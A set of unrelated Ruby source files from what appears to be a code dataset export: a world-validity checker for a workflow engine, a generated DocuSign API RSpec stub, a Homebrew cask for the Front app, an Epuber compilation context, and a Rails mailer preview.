rescue => e
if e.is_a?(KeyError)
logger.error "invalidated execution plan #{execution_lock.execution_plan_id} missing, skipping"
else
logger.error e
logger.error "unexpected error when invalidating execution plan #{execution_lock.execution_plan_id}, skipping"
end
coordinator.release(execution_lock)
coordinator.release_by_owner(execution_lock.id)
return
end
unless plan.valid?
logger.error "invalid plan #{plan.id}, skipping"
coordinator.release(execution_lock)
coordinator.release_by_owner(execution_lock.id)
return
end
yield plan
end
# Performs world validity checks
#
# @return [Integer] number of invalidated worlds
def perform_validity_checks
world_invalidation_result = worlds_validity_check
locks_validity_check
world_invalidation_result.values.select { |result| result == :invalidated }.size
end
# Checks if all worlds are valid and optionally invalidates them
#
# @param auto_invalidate [Boolean] whether automatic invalidation should be performed
# @param worlds_filter [Hash] hash of filters to select only matching worlds
# @return [Hash{String=>Symbol}] hash containg validation results, mapping world id to a result
def worlds_validity_check(auto_invalidate = true, worlds_filter = {})
worlds = coordinator.find_worlds(false, worlds_filter)
world_checks = worlds.reduce({}) do |hash, world|
hash.update(world => ping_without_cache(world.id, self.validity_check_timeout))
end
world_checks.values.each(&:wait)
results = {}
world_checks.each do |world, check|
if check.fulfilled?
result = :valid
else
if auto_invalidate
begin
invalidate(world)
result = :invalidated
rescue => e
logger.error e
result = e.message
end
else
result = :invalid
end
end
results[world.id] = result
end
unless results.values.all? { |result| result == :valid }
logger.error "invalid worlds found #{results.inspect}"
end
return results
end
# Cleans up locks which don't have a resource
#
# @return [Array<Coordinator::Lock>] the removed locks
def locks_validity_check
orphaned_locks = coordinator.clean_orphaned_locks
unless orphaned_locks.empty?
logger.error "invalid coordinator locks found and invalidated: #{orphaned_locks.inspect}"
end
return orphaned_locks
end
private
def invalidate_step(step)
if step.state == :running
step.error = ExecutionPlan::Steps::Error.new("Abnormal termination (previous state: #{step.state})")
step.state = :error
step.save
end
end
end
end
end
| 37.738889 | 122 | 0.626086 |
bb9cd4e685804da3c3e1f3839b5e86078b54223a | 1,310 | =begin
#DocuSign REST API
#The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::EnvelopeDocumentsResult
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'EnvelopeDocumentsResult' do
before do
# run before each test
@instance = SwaggerClient::EnvelopeDocumentsResult.new
end
after do
# run after each test
end
describe 'test an instance of EnvelopeDocumentsResult' do
it 'should create an instact of EnvelopeDocumentsResult' do
expect(@instance).to be_instance_of(SwaggerClient::EnvelopeDocumentsResult)
end
end
describe 'test attribute "envelope_documents"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "envelope_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.291667 | 123 | 0.755725 |
edc64dfdd2e64d565b8a3c35f77e49190898e809 | 342 | cask 'front' do
version '3.21.7'
sha256 '9089e1faf406e94bc7da27579b994d12681e9ed2ffd937c631282c7f22d72917'
url "https://dl.frontapp.com/desktop/builds/#{version}/Front-#{version}.zip"
appcast 'https://dl.frontapp.com/desktop/updates/latest/mac/latest-mac.yml'
name 'Front'
homepage 'https://frontapp.com/'
app 'Front.app'
end
| 28.5 | 78 | 0.745614 |
bf5c01d0db5b2fe0a532c646c68f93a86f60614b | 2,605 | # encoding: utf-8
module Epuber
class Compiler
class CompilationContext
# @return [Epuber::Book]
#
attr_reader :book
# @return [Epuber::Book::Target]
#
attr_reader :target
# @return [Epuber::Compiler::FileResolver]
#
attr_accessor :file_resolver
# This will track source files regardless of current target
#
# @return [Epuber::Compiler::FileDatabase]
#
attr_reader :source_file_database
# This will track source files depend on current target
#
# @return [Epuber::Compiler::FileDatabase]
#
attr_reader :target_file_database
# @return [Array<Epuber::Plugin>]
#
def plugins
@plugins ||= @target.plugins.map do |path|
begin
plugin = Plugin.new(path)
plugin.files.each do |file|
file_resolver.add_file(file)
end
plugin
rescue LoadError
UI.error "Can't find plugin at path #{path}"
end
end.compact
end
# @param [Class] klass class of thing you want to perform (Checker or Transformer)
# @param [Symbol] source_type source type of that thing (Checker or Transformer)
#
# @yield
# @yieldparam [Epuber::CheckerTransformerBase] instance of checker or transformer
#
# @return nil
#
def perform_plugin_things(klass, source_type)
plugins.each do |plugin|
plugin.instances(klass).each do |instance|
# @type [Epuber::CheckerTransformerBase] instance
next if instance.source_type != source_type
next if instance.options.include?(:run_only_before_release) && !release_build
yield instance
end
end
end
#########
# @return [Bool]
#
attr_accessor :should_check
# @return [Bool]
#
attr_accessor :should_write
# @return [Bool]
#
attr_accessor :release_build
# @return [Bool]
#
attr_accessor :use_cache
# @return [Bool]
#
attr_accessor :verbose
def verbose?
verbose
end
def debug?
!release_build
end
def incremental_build?
use_cache
end
def initialize(book, target)
@book = book
@target = target
@source_file_database = FileDatabase.new(Config.instance.file_stat_database_path)
@target_file_database = FileDatabase.new(Config.instance.target_file_stat_database_path(target))
end
end
end
end
| 23.053097 | 104 | 0.587332 |
f7d3ac8e222f517af7e067ccbe79660d4ecaeb5e | 591 | module TastesBitter
# Preview all emails at http://localhost:3000/rails/mailers/tastes_bitter_mailer
class TastesBitterMailerPreview < ActionMailer::Preview
def error_message
error_info = {
message: "A message",
file_or_page: "A file or page",
line_number: "A line number",
user_agent: "A user agent",
current_page: "A page",
platform: "A platform",
browser_name: "A browser",
browser_version: "A browser version"
}
::TastesBitter::JavascriptMailer.javascript_error(error_info)
end
end
end
| 24.625 | 82 | 0.654822 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.